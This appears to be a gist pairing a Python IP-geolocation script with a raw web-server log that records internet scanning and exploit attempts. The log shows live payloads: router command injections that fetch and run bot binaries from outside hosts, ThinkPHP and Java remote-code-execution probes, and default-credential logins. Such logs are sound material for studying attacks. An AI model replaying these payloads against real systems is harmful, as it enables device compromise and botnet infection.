@gmemstr
Last active September 12, 2019 09:43
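#!/usr/bin/python3
#
# Print geolocation of each IP address listed in ips.txt.
import requests

api_key = ""  # ipstack access key
base_url = "http://api.ipstack.com/"
results = dict()  # cache: ip -> country name, so repeated IPs cost no API call

with open("ips.txt", "r") as f:
    for line in f:
        ip = line.strip()
        if not ip:
            continue  # skip blank lines
        if ip in results:
            print(ip + " - " + results[ip] + " [DUPE]")
            continue
        resp = requests.get(url=base_url + ip, params={"access_key": api_key}, timeout=10)
        data = resp.json()
        # The lookup can come back without a country (error body or null value),
        # so fall back to a label instead of raising KeyError/TypeError.
        country = data.get("country_name") or "Unknown"
        print(ip + " - " + country)
        results[ip] = country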
77.159.81.103 - France
5.202.80.16 - Iran
92.63.194.3 - Russia
92.63.194.3 - Russia [DUPE]
213.79.119.226 - Russia
77.48.60.45 - Czechia
106.75.85.37 - China
106.75.85.117 - China
117.50.63.227 - China
216.218.206.67 - United States
14.186.44.242 - Vietnam
14.186.44.242 - Vietnam [DUPE]
77.42.105.196 - Iran
154.223.34.116 - Hong Kong SAR China
151.73.179.172 - Italy
151.73.179.172 - Italy [DUPE]
103.21.141.44 - China
103.21.141.44 - China [DUPE]
103.21.141.44 - China [DUPE]
103.21.141.44 - China [DUPE]
103.21.141.44 - China [DUPE]
5.202.212.196 - Iran
103.73.182.207 - India
197.255.219.18 - Nigeria
46.28.124.97 - Italy
94.241.128.94 - Iran
201.76.120.222 - Brazil
139.162.111.98 - Japan
94.66.37.178 - Greece
94.66.37.178 - Greece [DUPE]
94.66.37.178 - Greece [DUPE]
94.66.37.178 - Greece [DUPE]
94.66.37.178 - Greece [DUPE]
94.66.37.178 - Greece [DUPE]
94.66.37.178 - Greece [DUPE]
94.66.37.178 - Greece [DUPE]
151.243.13.122 - Iran
92.119.160.78 - Russia
186.233.178.85 - Brazil
77.247.108.162 - Germany
77.247.108.162 - Germany [DUPE]
163.172.111.59 - France
163.172.111.59 - France [DUPE]
92.119.160.10 - Russia
83.143.86.62 - Norway
83.143.86.62 - Norway [DUPE]
80.30.227.210 - Spain
177.68.196.237 - Brazil
103.233.123.196 - India
184.105.139.70 - United States
23.225.121.171 - United States
23.225.121.171 - United States [DUPE]
82.55.112.168 - Italy
36.91.171.37 - Indonesia
109.74.50.98 - Hungary
191.97.32.4 - Argentina
42.201.253.130 - Pakistan
120.204.202.112 - China
120.204.202.112 - China [DUPE]
120.204.202.112 - China [DUPE]
120.204.202.112 - China [DUPE]
120.204.202.112 - China [DUPE]
50.209.104.212 - United States
91.108.156.233 - Iran
66.240.205.34 - United States
66.240.205.34 - United States [DUPE]
66.240.205.34 - United States [DUPE]
66.240.205.34 - United States [DUPE]
66.240.205.34 - United States [DUPE]
202.84.77.238 - Cambodia
122.228.19.79 - China
194.61.24.189 - Netherlands
194.61.24.189 - Netherlands [DUPE]
139.162.79.87 - Japan
184.105.139.68 - United States
86.58.116.43 - Slovenia
178.93.18.164 - Ukraine
103.47.219.149 - India
92.39.54.176 - Moldova
101.132.148.50 - China
101.132.148.50 - China [DUPE]
191.205.92.242 - Brazil
92.119.160.10 - Russia [DUPE]
113.173.230.35 - Vietnam
113.173.230.35 - Vietnam [DUPE]
139.162.111.98 - Japan [DUPE]
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Length: 0
77.159.81.103 - - [10/Sep/2019 12:50:21] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /global-protect/login.esp
Headers:
Host: 157.245.46.181
X-Real-IP: 169.197.108.22
X-Forwarded-For: 169.197.108.22
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: */*
Accept-Encoding: gzip
127.0.0.1 - - [10/Sep/2019 13:08:56] "GET /global-protect/login.esp HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Length: 0
5.202.80.16 - - [10/Sep/2019 13:47:03] "GET / HTTP/1.1" 200 -
92.63.194.3 - - [10/Sep/2019 14:34:18] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
92.63.194.3 - - [10/Sep/2019 14:34:18] "/*àCookie: mstshash=Administr" 400 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Length: 0
213.79.119.226 - - [10/Sep/2019 14:44:37] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Length: 0
77.48.60.45 - - [10/Sep/2019 14:48:37] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
Accept: */*
106.75.85.37 - - [10/Sep/2019 15:31:03] "GET / HTTP/1.0" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Accept-Language: zh-CN,zh;q=0.8
Connection: close
106.75.85.117 - - [10/Sep/2019 15:31:04] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
Accept: */*
117.50.7.159 - - [10/Sep/2019 15:31:10] "GET / HTTP/1.0" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
Accept: */*
117.50.63.227 - - [10/Sep/2019 15:31:35] "GET / HTTP/1.0" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181
216.218.206.67 - - [10/Sep/2019 15:37:52] "GET / HTTP/1.1" 200 -
----------------------------------------
Exception happened during processing of request from ('220.98.235.154', 56231)
Traceback (most recent call last):
File "/usr/lib/python3.6/socketserver.py", line 320, in _handle_request_noblock
self.process_request(request, client_address)
File "/usr/lib/python3.6/socketserver.py", line 351, in process_request
self.finish_request(request, client_address)
File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/usr/lib/python3.6/http/server.py", line 418, in handle
self.handle_one_request()
File "/usr/lib/python3.6/http/server.py", line 406, in handle_one_request
method()
File "./server.py", line 22, in do_POST
content_length = int(self.headers['Content-Length']) # <--- Gets the size of data
TypeError: int() argument must be a string, a bytes-like object or a number, not 'NoneType'
----------------------------------------
14.186.44.242 - - [10/Sep/2019 16:19:53] code 400, message Bad request version ('HTTP')
14.186.44.242 - - [10/Sep/2019 16:19:53] "GET ../../mnt/custom/ProductDefinition HTTP" 400 -
INFO:root:POST request,
Path: /tmUnblock.cgi
Headers:
Host: 192.168.0.14:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.20.0
Content-Length: 227
Content-Type: application/x-www-form-urlencoded
Body:
ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+linksys.cloudbot%3B+wget+http%3A%2F%2F83.166.252.112%2Fbins%2Flinksys.cloudbot%3B+chmod+777+linksys.cloudbot%3B+.%2Flinksys.cloudbot+linksys.cloudbot
%60&action=&ttcp_num=2&ttcp_size=2&submit_bu
77.42.105.196 - - [10/Sep/2019 17:27:30] "POST /tmUnblock.cgi HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
154.223.34.116 - - [10/Sep/2019 17:40:58] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181
X-Real-IP: 154.223.34.116
X-Forwarded-For: 154.223.34.116
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
127.0.0.1 - - [10/Sep/2019 17:40:59] "GET / HTTP/1.1" 200 -
151.73.179.172 - - [10/Sep/2019 17:55:30] code 400, message Bad request version ('HTTP')
151.73.179.172 - - [10/Sep/2019 17:55:30] "GET ../../mnt/custom/ProductDefinition HTTP" 400 -
INFO:root:GET request,
Path: /cgi-bin/config.exp
Headers:
Host: 157.245.46.181
X-Real-IP: 128.14.134.170
X-Forwarded-For: 128.14.134.170
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: */*
Accept-Encoding: gzip
127.0.0.1 - - [10/Sep/2019 18:56:04] "GET /cgi-bin/config.exp HTTP/1.1" 200 -
----------------------------------------
Exception happened during processing of request from ('172.104.242.173', 57009)
Traceback (most recent call last):
File "/usr/lib/python3.6/socketserver.py", line 320, in _handle_request_noblock
self.process_request(request, client_address)
File "/usr/lib/python3.6/socketserver.py", line 351, in process_request
self.finish_request(request, client_address)
File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/usr/lib/python3.6/http/server.py", line 418, in handle
self.handle_one_request()
File "/usr/lib/python3.6/http/server.py", line 386, in handle_one_request
self.raw_requestline = self.rfile.readline(65537)
File "/usr/lib/python3.6/socket.py", line 586, in readinto
return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
INFO:root:GET request,
Path: /TP/public/index.php
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
Connection: close
Accept-Encoding: gzip
103.21.141.44 - - [10/Sep/2019 18:59:46] "GET /TP/public/index.php HTTP/1.1" 200 -
INFO:root:GET request,
Path: /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
Connection: close
Accept-Encoding: gzip
103.21.141.44 - - [10/Sep/2019 18:59:47] "GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 200 -
INFO:root:POST request,
Path: /TP/public/index.php?s=captcha
Headers:
Host: 157.245.46.181:8080
User-Agent: Go-http-client/1.1
Content-Length: 84
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Body:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=uname&ipconfig
103.21.141.44 - - [10/Sep/2019 18:59:48] "POST /TP/public/index.php?s=captcha HTTP/1.1" 200 -
INFO:root:POST request,
Path: /users?page=&size=5
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
Content-Length: 119
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Body:
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/su")]=&password=&repeatedPassword=
103.21.141.44 - - [10/Sep/2019 18:59:49] "POST /users?page=&size=5 HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
Connection: close
Accept-Encoding: gzip
103.21.141.44 - - [10/Sep/2019 18:59:50] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181
X-Real-IP: 128.14.209.154
X-Forwarded-For: 128.14.209.154
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: */*
Accept-Encoding: gzip
127.0.0.1 - - [10/Sep/2019 19:11:11] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181
X-Real-IP: 213.32.122.82
X-Forwarded-For: 213.32.122.82
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
127.0.0.1 - - [10/Sep/2019 19:53:40] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Length: 0
5.202.212.196 - - [10/Sep/2019 21:41:22] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Length: 0
103.73.182.207 - - [10/Sep/2019 23:03:57] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Length: 0
197.255.219.18 - - [10/Sep/2019 23:31:07] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7
Content-Length: 0
46.28.124.97 - - [10/Sep/2019 23:55:07] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /admin-scripts.asp
Headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Host: 157.245.46.181
Authorization: Basic YWRtaW46YWRtaW4=
80.211.6.136 - - [11/Sep/2019 00:05:43] "GET /admin-scripts.asp HTTP/1.1" 200 -
INFO:root:GET request,
Path: /admin-scripts.asp
Headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Host: 157.245.46.181
Authorization: Basic cm9vdDphZG1pbg==
80.211.6.136 - - [11/Sep/2019 00:05:43] "GET /admin-scripts.asp HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Length: 0
94.241.128.94 - - [11/Sep/2019 01:09:25] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Length: 0
201.76.120.222 - - [11/Sep/2019 01:12:51] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181
X-Real-IP: 184.105.139.67
X-Forwarded-For: 184.105.139.67
X-Forwarded-Proto: https
Connection: close
127.0.0.1 - - [11/Sep/2019 01:23:45] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: HTTP Banner Detection (https://security.ipip.net)
Connection: close
139.162.111.98 - - [11/Sep/2019 01:31:57] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181
X-Real-IP: 62.173.147.6
X-Forwarded-For: 62.173.147.6
X-Forwarded-Proto: https
Connection: close
127.0.0.1 - - [11/Sep/2019 02:03:40] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181
X-Real-IP: 62.173.147.6
X-Forwarded-For: 62.173.147.6
X-Forwarded-Proto: https
Connection: close
127.0.0.1 - - [11/Sep/2019 02:03:40] "GET / HTTP/1.1" 200 -
94.66.37.178 - - [11/Sep/2019 02:59:08] code 400, message Bad request version ('HTTP')
94.66.37.178 - - [11/Sep/2019 02:59:08] "GET ../../mnt/custom/ProductDefinition HTTP" 400 -
94.66.37.178 - - [11/Sep/2019 03:09:43] code 400, message Bad request version ('HTTP')
94.66.37.178 - - [11/Sep/2019 03:09:43] "GET ../../mnt/custom/ProductDefinition HTTP" 400 -
94.66.37.178 - - [11/Sep/2019 03:13:42] code 400, message Bad request version ('HTTP')
94.66.37.178 - - [11/Sep/2019 03:13:42] "GET ../../mnt/custom/ProductDefinition HTTP" 400 -
94.66.37.178 - - [11/Sep/2019 03:22:51] code 400, message Bad request version ('HTTP')
94.66.37.178 - - [11/Sep/2019 03:22:51] "GET ../../mnt/custom/ProductDefinition HTTP" 400 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7
Content-Length: 0
151.243.13.122 - - [11/Sep/2019 05:16:33] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
Connection: keep-alive
Accept-Encoding: gzip,deflate
92.119.160.78 - - [11/Sep/2019 05:22:54] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Length: 0
186.233.178.85 - - [11/Sep/2019 05:26:03] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181
X-Real-IP: 138.68.208.193
X-Forwarded-For: 138.68.208.193
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 zgrab/0.x
Accept: */*
Accept-Encoding: gzip
127.0.0.1 - - [11/Sep/2019 05:53:12] "GET / HTTP/1.1" 200 -
77.247.108.162 - - [11/Sep/2019 07:27:25] code 400, message Bad request syntax ('\x16\x03\x01\x00Ò\x01\x00\x00Î\x03\x03d\x15]Få¬$.·ÞÚ\\\x1c¦Zì\x02Ø]\x9f<-Ø@Üü¼Xd\t_\x85\x00\x00bÀ0À,À/
À+\x00\x9f\x00\x9eÀ2À.À1À-\x00¥\x00¡\x00¤\x00\xa0À(À$À\x14À')
77.247.108.162 - - [11/Sep/2019 07:27:25] "ÒÎd]Få¬$.·ÞÚ\¦ZìØ]<-Ø@Üü¼Xd _
bÀ0À,À/À+À2À.À1À-¥¡¤ À(À$ÀÀ" 400 -
163.172.111.59 - - [11/Sep/2019 08:36:19] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00+&à\x00\x00\x00\x00\x00Cookie:')
163.172.111.59 - - [11/Sep/2019 08:36:19] "+&àCookie: mstshash=hello" 400 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181
X-Real-IP: 71.6.232.7
X-Forwarded-For: 71.6.232.7
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Accept: */*
Accept-Encoding: gzip
127.0.0.1 - - [11/Sep/2019 09:05:35] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
Connection: keep-alive
Accept-Encoding: gzip,deflate
92.119.160.10 - - [11/Sep/2019 09:08:54] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /Lists/admin.php
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 zgrab/0.x
Accept: */*
Accept-Encoding: gzip
83.143.86.62 - - [11/Sep/2019 09:13:23] "GET /Lists/admin.php HTTP/1.1" 200 -
INFO:root:GET request,
Path: /admin.php
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 zgrab/0.x
Accept: */*
Accept-Encoding: gzip
83.143.86.62 - - [11/Sep/2019 09:13:23] "GET /admin.php HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Length: 0
80.30.227.210 - - [11/Sep/2019 09:25:56] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Length: 0
177.68.196.237 - - [11/Sep/2019 09:47:28] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Length: 0
103.233.123.196 - - [11/Sep/2019 10:13:53] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181
184.105.139.70 - - [11/Sep/2019 10:52:51] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Connection: close
Accept: */*
Accept-Language: zh-cn
Referer: http://157.245.46.181:8080/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Host: 157.245.46.181:8080
23.225.121.171 - - [11/Sep/2019 11:09:34] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181
X-Real-IP: 23.225.121.171
X-Forwarded-For: 23.225.121.171
X-Forwarded-Proto: https
Connection: close
Accept: */*
Accept-Language: zh-cn
Referer: https://157.245.46.181/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
127.0.0.1 - - [11/Sep/2019 11:09:34] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Connection: close
Accept: */*
Accept-Language: zh-cn
Referer: http://157.245.46.181:8080/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Host: 157.245.46.181:8080
23.225.121.171 - - [11/Sep/2019 11:09:35] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181
X-Real-IP: 23.225.121.171
X-Forwarded-For: 23.225.121.171
X-Forwarded-Proto: https
Connection: close
Accept: */*
Accept-Language: zh-cn
Referer: https://157.245.46.181/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
127.0.0.1 - - [11/Sep/2019 11:09:36] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/&currentsetting.htm=1
Headers:
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: Mozilla/5.0
82.55.112.168 - - [11/Sep/2019 11:28:50] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/&currentsetting.htm=1 HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Length: 0
36.91.171.37 - - [11/Sep/2019 12:12:52] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Length: 0
109.74.50.98 - - [11/Sep/2019 13:25:56] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Length: 0
191.97.32.4 - - [11/Sep/2019 14:48:23] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Length: 0
42.201.253.130 - - [11/Sep/2019 15:03:52] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Length: 0
177.72.2.186 - - [11/Sep/2019 16:26:00] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181
X-Real-IP: 196.52.43.62
X-Forwarded-For: 196.52.43.62
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3602.2 Safari/537.36
127.0.0.1 - - [11/Sep/2019 17:48:39] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /TP/public/index.php
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
Connection: close
Accept-Encoding: gzip
120.204.202.112 - - [11/Sep/2019 18:36:54] "GET /TP/public/index.php HTTP/1.1" 200 -
INFO:root:GET request,
Path: /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
Connection: close
Accept-Encoding: gzip
120.204.202.112 - - [11/Sep/2019 18:36:55] "GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 200 -
INFO:root:POST request,
Path: /TP/public/index.php?s=captcha
Headers:
Host: 157.245.46.181:8080
User-Agent: Go-http-client/1.1
Content-Length: 84
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Body:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=uname&ipconfig
120.204.202.112 - - [11/Sep/2019 18:36:55] "POST /TP/public/index.php?s=captcha HTTP/1.1" 200 -
INFO:root:POST request,
Path: /users?page=&size=5
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
Content-Length: 119
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Body:
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/su")]=&password=&repeatedPassword=
120.204.202.112 - - [11/Sep/2019 18:36:56] "POST /users?page=&size=5 HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
Connection: close
Accept-Encoding: gzip
120.204.202.112 - - [11/Sep/2019 18:36:56] "GET / HTTP/1.1" 200 -
INFO:root:POST request,
Path: /tmUnblock.cgi
Headers:
Host: 127.0.0.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Liquor 1.0
Content-Length: 312
Content-Type: application/x-www-form-urlencoded
Body:
ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+loli%3B+wget+http%3A%2F%2Fardp.hldns.ru%2Floligang.mpsl%3B+chmod+777+loligang.mpsl%3B+.%2Floligang.mpsl+loligang.mpsl.linksys%60&action=&ttcp_num=2&t
tcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
50.209.104.212 - - [11/Sep/2019 19:43:56] "POST /tmUnblock.cgi HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
